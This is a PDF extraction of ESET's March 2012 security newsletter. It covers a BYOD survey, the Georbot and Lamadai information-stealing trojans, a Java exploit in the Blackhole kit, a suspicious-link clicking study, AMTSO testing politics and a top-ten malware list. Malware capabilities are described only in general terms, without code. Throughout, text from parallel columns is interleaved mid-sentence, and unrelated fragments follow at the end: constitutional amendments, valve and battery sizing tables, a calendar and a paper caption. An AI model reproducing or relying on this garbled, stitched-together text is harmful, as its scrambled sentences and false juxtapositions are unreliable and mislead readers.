March 2012 Feature Article: Sizing Up The BYOD Security Challenge
March 2012Feature Article: Sizing Up the BYODSecurity Challenge
Table of ContentsSizing Up the BYOD Security Challenge .3Java Holes and Targeted Attacks .4Gender and the Success of Suspicious Links .6AMTSO, Testing, and ESET’s Dutch Treat .7The Top Ten Threats .8Top Ten Threats at a Glance (graph) . 11About ESET . 12Additional resources. 12
Sizing Up the BYOD SecurityChallengeStephen Cobb, ESET Security Evangeliston these devices; for example, encryption of company data isonly happening on about one third of them. One third of thosesurveyed responded that company data is not encrypted whenit is on their personal devices and the remaining third did notknow one way or the other, which is worrying in itself. You canDo you let your employees use their own computers for work?see more of the findings in the accompanying infographic.How about smartphones, iPads and other tablet devices? If so,you are not alone. The phenomenon of allowing or encouragingemployees to use their own devices for work--known as BringYour Own Device, or BYOD--is now widespread in manycountries. On the plus side, you may get more work frompeople when they can work in more places and at more timesof the day (from the breakfast table in the morning to thekitchen table at night and the coffee shop in between). Therecan be cost savings too: equipment outlays can be reduced ifemployees use their own devices instead of the companybuying them.At the same time, IT security managers must weigh thosebenefits against the security risks that come with these devices,plus the cost of bringing them into line with existing securitypolicies and compliance standards. For example, what are thelegal ramifications of an employee’s personal laptop goingmissing when it contains your customer list or sensitive internalcorrespondence?To help companies get a handle on the scale and scope of theserisks, ESET engaged Harris Interactive to survey some 1,300adults in America who are currently employed. We found morethan 80 percent of them “use some kind of personally ownedelectronic device for work-related functions.” Many of thesedevices are older technologies like laptop and desktopcomputers, but smartphones and tablets are already asignificant part of the BYOD phenomenon.One particular area of concern is small devices—like tablets andUnfortunately, the survey paints a worrying picture of security
smartphones—that are easier to steal than laptops andcompany is handling BYOD security. With roughly two thirds ofdesktops but pack tremendous processing, storage, andour survey respondents reporting that their employer had notcommunication capabilities. Consider the Microsoft Wordyet implemented a BYOD policy, or provided any securitydocument in which the results of ESET’s BYOD survey weretraining, those would be good places to start.presented. This file takes up 170 kilobytes of storage space andcontains 17 pages of charts, tables, and text that summarize themost important findings from this not inexpensive research.That means you could easily store more than 70,000 similarreports on 16 gigabyte smart phone or microSD card. Asmartphone could transmit all 70,000 documents to the otherside of the world in matter of minutes on a WiFi or 4G/LTEconnection (the latter could prove costly, but the recipientmight be happy to pay the data overage).So it is not good news to learn that only 25 percent ofsmartphone users, and less than 10 percent of tablet users, saythey have enabled auto-locking on these devices (the featurethat locks the device after a period of inactivity and requires apassword or code to unlock). Overall, we found that less thanhalf of all devices in the BYOD category are protected by basicsecurity measures. On the bright side, BYOD security could beboosted cheaply and quickly if companies did the following: Java Holes and TargetedAttacksMarch produced a number of important new insights intomalware threats and ESET researchers around the world werehard at work bringing these to light. Here we highlight threethreats, starting with the information stealing trojan that ESETdubbed Win32/Georbot.The name Win32/Georbot is derived from Georgia, the countryin Eurasia, because ESET researchers found the malware wasreceiving updates from a domain belonging to the Georgiangovernment. Of course, that does not mean the malware, orthe botnet created with it, had anything to do with theGeorgian government (in fact it should be noted that the DataExchange Agency of the Ministry of Justice of Georgia and itsnational CERT cooperated with ESET on this matter). However,from our analysis of the code it appears that citizens of GeorgiaMandate auto-locking with password protection onall devices.might be the intended target of the malware’s informationstealing capabilities. A review of the stealing functionality ofthis malware is a reminder of how pernicious such threats can Enable remote lock/wipe to protect data on anybe. Once it infects a system, Win32/Georbot can:stolen devices. Enable encryption of company data on all devices. Make sure up-to-date anti-malware protection isSend any file from the local hard drive to the remoteserver. Steal certificates Search the hard drive for Microsoft Word documentsactive on all devices.In summary, now would be a good time to check how your
Search the hard drive for remote desktopThe second recently discovered threat we want to highlight isconfiguration filesgreat news for conspiracy theorists because it is a secondinformation stealing botnet with manual controls and geo- Take screenshotspolitical targeting. This time the country is Tibet and the targetappears to be NGOs (Non-Governmental Organizations). We Record audio using the microphonepublished a detailed analysis of the Mac OS X payload deliveredby this malware, dubbed OSX/Lamadai.A. Record video using the webcamAlthough this code exploits a vulnerability that Apple patched Scan the local network to identify other hosts on thesame networksome time ago (Java vulnerability CVE-2011-3544), we did seeinfections and our researchers we able to observecommunications between a sacrificial test machine and the Execute arbitrary commands on the infected systembotnet’s C&C (Command and Control, the software from whichthe botnet owner or botmaster, monitors and manages theAnd those are just the information stealing capabilities of thisbotnet. Interestingly, these commands are not automated butactivated manually, sent to each host individually rather thaninfected machines). In fact, we observed the botmaster typingin commands as he or she looks for sensitive files on ourmachine.being broadcast to all infected hosts. ESET researchers wereable to gain access to the botnet’s control panel and in doing sodiscovered lists of keywords used to search through Word fileson infected machines. For more on this threat, you can find asummary of our analysis in a blog post cleverly titled FromGeorgia With Love and the full report is available as a PDF file.The third in our trio of highlighted threats continues the Javatheme, a new exploit for the Java CVE-2012-0507 vulnerabilityfound in a new version of the Blackhole exploit kit. These days,Java vulnerabilities are the number one target for exploit kitdevelopers because they are the most effective way ofexploiting end-user systems and can sometimes be effectiveacross a variety of platforms. Our write-up of this latestexample tracks many incidents involving the infection ofpopular and legitimate Russian sites where iFrames redirectvictims to the latest version of Blackhole. Yet again we arereminded that it is imperative to keep your patches current andyour antivirus updated.
Gender and the Success ofSuspicious LinksUrban Schrott, ESET IrelandThe survey revealed that money saving offers were the mostirresistible (29%) followed by disaster news (25%). Free movieand music downloads lured some people (16%) as did freegame downloads (10%). Celebrity gossip and photos were anadmitted weakness for some (12% and 11% respectively).Sub-head or first sentence: A new ESET Ireland study revealswhich online topics may be irresistible, compelling both menAdvertisements promising easy money tempted 13% whilesocial media apps lured 12%.and women to click on links even if they seem suspicious.Perhaps it is not surprising, but the survey also revealedRecently ESET Ireland commissioned a survey to find out underwhat circumstances people would click on a suspicious link insocial media, online ads or unsolicited email (spam). In otherwords, would they still click even if they were not sure it wassafe to do so, knowing that it could be fake or malicious?interesting gender differences when it came to temptation. Forexample, satisfying the shopping urge was worth a risky clickfor one in three women, but only one in four men weretempted by shopping offers. However, the roles reverse when itcomes to free downloads. There males are far ahead inrecklessness, as 20% (even up to 23% in age group 15-24) ofmales and only 12% of females will engage in downloadingThe good news is that 49 percent of those surveyed said theywould not click, regardless of the type of “bait” such as anmusic, films or computer games from dodgy websites whichcould cause malware infection in the process.unbelievably low price on a popular product or news of a majordisaster. Of course, everyone has heard the phrase: If it lookstoo good to be true, it probably is. Our Irish colleagues havebeen telling Irish computer users this for some time withregards to spam and various online offers that promiseincredible deals. The fact that about half of all users can resistthe urge to click dodgy links suggests that the message isgetting through, but what about the other half?Disaster news appears to be equally interesting to females andmales, but particularly interesting to youths (30% of age group15-25). Our Irish colleagues found one more positive note; itseems the Irish have not yet succumbed to the celebrityobsessions of some other nations, because less than 12%appear suseptible to the dangers of suspcious links to celebrityphotos or gossip.What to do and how to know what to click on?Of course, the point of the survey was to draw attention to theproblems that can arise from giving into temptation when yousee an alluring but suspicious link. A significant percentage ofmalware infections rely on this type of user interaction. So hereare some tips to share with friends and family and colleagues inthe workplace:
Act responsible and don’t just click on everything youcommunicationsfind appealing. Internet fraudsters are counting onyour curiosity to help them spread malware and lure people into financial scams. Do your online shopping on reputable websites andmake sure they have the safety certifications forThe security of unlocking an Android based device,the future is near? From Georgia With Love: Win32/Georbot informationstealing Trojan and botnetsecure payments.However, it turned out that there was a slight problem. Get your world news from known news websites,from your local TV or radio stations’ websites, etc.For most of the past three years, Righard and I have both beenMany scams are spread through email and socialon the Board of Directors of AMTSO (the Anti-Malware Testingmedia by pretending to show “yet unseen footage”Standards Organization), of which Righard is the President, andfrom some recent disaster.two directors representing the same member entity is againstthe organization’s bylaws. So I’ve stepped down from the Board And, as always, think before you click!a little earlier than anticipated (I wasn’t planning to stand forre-election this year, so it was an easy decision). Rest assured (ifAMTSO, Testing, and ESET’sDutch TreatDavid Harley, ESET Senior Research Fellowyou do find it reassuring!) that I still represent ESET N. Americain AMTSO and will continue to engage with the organization, Istill wholeheartedly support AMTSO’s aim of raising testingstandards, I will continue to do authoring jobs on behalf ofAMTSO when I can find time, and I have every intention ofRighard Zwienenberg is not only an enormously respectedsecurity researcher but also an old friend (well, nowhere nearas old as I am, but not many people are, though Stephen Cobbis getting there!), and I was very pleased to hear, after manyyears at Norman (and at Thunderbyte before that), that therecommenting even more regularly on testing issues. In fact, I’llbe presenting a paper on “After AMTSO: a Funny ThingHappened on the Way to the Forum” at EICAR in May (and, byway of a complete contrast, another on PIN selectionstrategies).was a possibility of his joining ESET. Since he joined ESET inFebruary as a Senior Research Fellow (yes, we’re replicatingvirally) in the Technology Division at ESET HQ in Bratislava, he’sintroduced himself with a volley of heavy-hitting blog articles:That sounds a bit as if I’m predicting the death of AMTSO atEICAR. Well, no, I’m not sending for the undertakers yet.However, part way through the second day of the recentworkshop in San Mateo, a major shift in direction was Password management for non-obvious accounts SKYPE: (S)ecurely (K)eep (P)ersonal (E)-proposed. AMTSO’s initial attempts to make testers andreviewers more accountable for the accuracy of their tests andtest reports through a ‘review of reviews’ analysis, attempting
to assess whether a review was compliant with theprinciples are maintained by good vendor-sponsoredorganization’s ‘Fundamental Principles of Testing’, attracted acomparatives, though not always with due credit. And that’sgreat deal of (mostly negative) attention. The new proposalnot a bad thing: those checks and balances help to keepcovers too much ground to summarize in a short article, but aeveryone honest. But sometimes the business relationshipkey component is the revival of the idea of tester accountabilitybetween a particular vendor and an apparently impartial reportin a different form: primarily, a more general review of theis far from transparent. Sometimes an apparently independenttesting landscape commissioned from academia.tester is underwritten by a single AV company, and may evenbe covertly hosted by such a company.I expect that proposal to excite a great deal of debate at thenext AMTSO meeting in May, and I’m not going to attempt toDon’t get me wrong: there are many honourable instances ofpredict what the final outcome will be. Personally, I have noinformation resources that are not only open about theirproblem with the principle of tester accountability. And itassociation with a particular vendor, but whose independenceseems to me that there is an undercurrent of admission hereis nevertheless generally unquestioned (Virus Bulletin testing is,that AMTSO has failed to convince the world that it’s anperhaps, the star example). However, there are always going toimpartial commentator on testing issues rather than simply abe doubts when a testing organization isn’t open about suchmouthpiece for companies selling a frequently denigratedlinks (or, come to that, its methodology), however good its teststechnology: it needs to channel the undoubted expertise of itsmay be. Or when it describes its test as ‘sponsor-independent’participants (vendors and testers) via a credible, trusted thirdtester while requiring large consultancy fees from companiesparty. The success of this proposal, if adopted, may wellwhose products it tests before discussing verification of itsdepend on how consistently both testers and vendors withintesting, (And don’t get me started on the ‘we’ll let you see thethe AMTSO community (both members and subscribers) cansamples – or in some cases, the simulated attack – but only ifput the well-being of the community ahead of their ownyou sign a form that stops you talking about it in public’vested interests as commercial organizations.gambit.)It’s all too easy to write off security researcher concerns aboutThe Top Ten Threatsthe standard of testing as ‘vendor whining’: a lot of mediacomment is based on the assumption that vendors hype and1. HTML/ScrInject.Btesters expose weaknesses. However, it’s worth rememberingthat testers (the professionals, at any rate) also have acommercial agenda, and it’s not always easy to detect bias in acomparative test report.Previous Ranking: 1Percentage Detected: 5.60%Generic detection of HTML web pages containing scriptobfuscated or iframe tags that that automatically redirect tothe malware download.The major certification testers are in a state of ongoingnegotiation with the vendors who are their customers, trying tostrike a balance between maintaining their independence andkeeping the vendors who are their customers, and the same
2. INF/AutorunPrevious Ranking: 2Percentage Detected: 5.19%Percentage Detected: 3.95%Type of infiltration: VirusHTML/Iframe.B is generic detection of malicious IFRAME tagsThis detection label is used to describe a variety of malwareembedded in HTML pages, which redirect the browser to ausing the file autorun.inf as a way of compromising a PC. Thisspecific URL location with malicious software.file contains information on programs meant to runautomatically when removable media (often USB flash drives4. Win32/Confickerand similar devices) are accessed by a Windows PC user. ESETsecurity software heuristically identifies malware that installs ormodifies autorun.inf files as INF/Autorun unless it is identifiedas a member of a specific malware family.Removable devices are useful and very popular: of course,malware authors are well aware of this, as INF/Autorun’sfrequent return to the number one spot clearly indicates.Here’s why it’s a problem.Previous Ranking: 4Percentage Detected: 3.44%The Win32/Conficker threat is a network worm originallypropagated by exploiting a recent vulnerability in the Windowsoperating system. This vulnerability is present in the RPC subsystem and can be remotely exploited by an attacker withoutvalid user credentials. Depending on the variant, it may alsospread via unsecured shared folders and by removable media,making use of the Autorun facility enabled at present by defaultThe default Autorun setting in Windows will automatically run ain Windows (though not in Windows 7).program listed in the autorun.inf file when you access manykinds of removable media. There are many types of malwarethat copy themselves to removable storage devices: while thisisn’t always the program’s primary distribution mechanism,malware authors are always ready to build in a little extra“value” by including an additional infection technique.Win32/Conficker loads a DLL through the svchost process. Thisthreat contacts web servers with pre-computed domain namesto download additional malicious components. Fullerdescriptions of Conficker variants are available athttp://www.eset.eu/buxus/generate page.php?page id 279&lng en.While using this mechanism can make it easy to spot for ascanner that uses this heuristic, it’s better, as Randy Abramshas suggested in our blog (http://blog.eset.com/?p 94 ;http://blog.eset.com/?p 828) to disable the Autorun functionby default, rather than to rely on antivirus to detect it in everycase. You may find Randy’s blog 5/nowyou-can-fix-autorun useful, too.While ESET has effective detection for Conficker, it’s importantfor end users to ensure that their systems are updated with theMicrosoft patch, which has been available since the thirdquarter of 2008, so as to avoid other threats using the samevulnerability. Information on the vulnerability itself is availableat /ms08067.mspx. While later variants dropped the code for infectingvia Autorun, it can’t hurt to disable it: this will reduce the3. HTML/Iframe.BPrevious Ranking: 3impact of the many threats we detect as INF/Autorun. TheResearch team in San Diego has blogged extensively onConficker issues: http://blog.eset.com/?cat 145
It’s important to note that it’s possible to avoid most Conficker8. Win32/Salityinfection risks generically, by practicing “safe hex”: keep up-todate with system patches, disable Autorun, and don’t useunsecured shared folders. In view of all the publicity Confickerhas received and its extensive use of a vulnerability that’s beenremediable for so many months, we’d expect Confickerinfections to be in decline by now if people were taking thesecommonsense precautions. While the current ranking looks likea drop in Conficker prevalence, this figure is affected by thechanges in naming and statistical measurement mentionedearlier: there’s no indication of a significant drop in Confickerinfections covering all variants.5. JS/AgentPrevious Ranking: 90Percentage Detected: 2.30%The trojan displays dialogs that ask the user to purchase aspecific product/service. After purchasing the product/service,the malware removes itself from the computer. Trojan isprobably a part of other malware.Previous Ranking: 8Percentage Detected: 1.72%Sality is a polymorphic file infector. When run starts a serviceand create/delete registry keys related with security activitiesin the system and to ensure the start of malicious process eachreboot of operating system.It modifies EXE and SCR files and disables services and processrelated to security solutions.More information relating to a specific signature:http://www.eset.eu/encyclopaedia/sality nar virus sality aasality am sality ah9. Win32/DorkbotPrevious Ranking: 7Percentage Detected: 1.68%Win32/Dorkbot.A is a worm that spreads via removable media.The worm contains a backdoor. It can be controlled remotely.The file is run-time compressed using UPX.The worm collects login user names and passwords when the6. JS/Iframe.ASPrevious Ranking: 66Percentage Detected: 2.04%JS/Iframe.AS is a trojan that redirects the browser to a specificURL location with malicious software. The program code of themalware is usually embedded in HTML pages.7. Win32/SirefefPrevious Ranking:Percentage Detected: 1.76%Win32/Sirefef.A is a trojan that redirects results of onlinesearch engines to web sites that contain adware.user browses certain web sites. Then, it attempts to sendgathered information to a remote machine. This kind of wormcan be controlled remotely.10. JS/RedirectorPrevious Ranking: 47Percentage Detected: 1.59%JS/Redirector is a trojan that redirects the browser to a specificURL location with malicious software. The program code of themalware is usually embedded in HTML pages.
Top Ten Threats at a Glance(graph)Analysis of ESET’s ThreatSense.Net , a sophisticated malware reportingand tracking system, shows that the highest number of detections thismonth, with almost 5.60% of the total, was scored by theHTML/Scrinject.B class of threat.
About ESETESET is a global provider of security software. The ESET NOD32 Antivirus and ESET Smart Security products are consistentlyrecognized among the most comprehensive and effectivesecurity solutions available today.Additional resourcesKeeping your knowledge up to date is as important as keepingyour AV updated. For these and other suggested resourcesplease visit the ESET Threat Center to view the latest: ESET White Papers ESET Blog ESET Podcasts Independent Benchmark Test Results Anti-Malware Testing and Evaluation
Sizing Up the BYOD Security Challenge Stephen Cobb, ESET Security Evangelist Do you let your employees use their own computers for work? How about smartphones, iPads and other tablet devices? If so, you are not alone. The phenomenon of allowing or encouraging employees to use their own devices for work--known as Bring
Amendments to the Louisiana Constitution of 1974 Article I Article II Article III Article IV Article V Article VI Article VII Article VIII Article IX Article X Article XI Article XII Article XIII Article XIV Article I: Declaration of Rights Election Ballot # Author Bill/Act # Amendment Sec. Votes for % For Votes Against %
2.4 Other types of control valves 40 2.5 Control valve selection summary 42 2.6 Summary 46 3 Valve Sizing for Liquid Flow 47 3.1 Principles of the full sizing equation 48 3.2 Formulae for sizing control valves for Liquids 51 3.3 Practical example of Cv sizing calculation 52 3.4 Summary 54 4 Valve Sizing for Gas and Vapor Flow 55
Battery Sizing Example 4. Sizing with Software 5. Battery Charger Sizing Saft Battery 2 Sizing. The Art and Science of Battery Sizing Saft Battery . 2-8 hr. battery backup normal Time (hh:mm:ss) Current (A) Paralleling Switchgear 8 120V to 600V (typical) DC bus 24, 48 or 125Vdc
SPECIFICATION DATA SHEET 74 Control Valve Data Sheet (Excel format) 75 CALCULATION SPREADSHEET Excel Format (British & SI unit) Sizing Spreadsheet for Liquid 75 Sizing Spreadsheet for Vapor 76 Example 1: Sizing a Control Valve in Liquid –Hydrocarbon 77 Example 2: Sizing a Control Valve in Liquid –Water 78
The challenge to building an FEA sizing model from a mesh of quadrilaterals and some triangles is how to develop user interfaces for easy setup of the sizing model and how to manage the inter-related data to generate the correct NASTRAN input file for sizing. The key ideas in this paper for automation of panel thickness sizing of aircraft
2008 (Ref. D), a sizing system and design were developed and optimized to accommodate the most individuals in the fewest sizes. The sizing system uses a three inch sizing interval for Chest Circumference in order to provide a better fit than the 4 inch interval currently used. For length, a two inch sizing interval for Torso Length is used.
Two-Year Calendar 7 Planning Calendars SCampus 2011-12 January 2012 May 2012 September 2012 February 2012 June 2012 October 2012 March 2012 July 2012 November 2012 April 2012 August 2012 December 2012 S M T W T F S
5 10 feature a feature b (a) plane a b 0 5 10 0 5 10 feature a feature c (b) plane a c 0 5 10 0 5 10 feature b feature c (c) plane b c Figure 1: A failed example for binary clusters/classes feature selection methods. (a)-(c) show the projections of the data on the plane of two joint features, respectively. Without the label .
